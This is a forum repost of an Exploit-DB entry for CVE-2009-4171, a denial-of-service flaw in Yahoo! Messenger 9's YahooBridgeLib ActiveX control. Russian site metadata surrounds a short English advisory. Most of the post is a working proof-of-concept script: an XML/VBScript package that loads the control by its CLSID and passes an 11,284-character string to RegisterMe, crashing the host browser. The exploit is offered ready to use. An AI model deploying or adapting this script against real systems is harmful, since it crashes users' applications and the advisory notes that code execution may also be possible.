Exploit Yahoo! Messenger 9 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33350
Проверка EDB
  1. Пройдено
Автор
HACKATTACK
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-4171
Дата публикации
2009-11-12
XML:
source: https://www.securityfocus.com/bid/37007/info

Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.

A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.

Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected. 

<?XML version='1.0' standalone='yes' ?>

<package><job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />

<script language='vbscript'>


arg1=String(11284, "A")

target.RegisterMe arg1

</script>

</job>

</package>
 
Источник
www.exploit-db.com

Похожие темы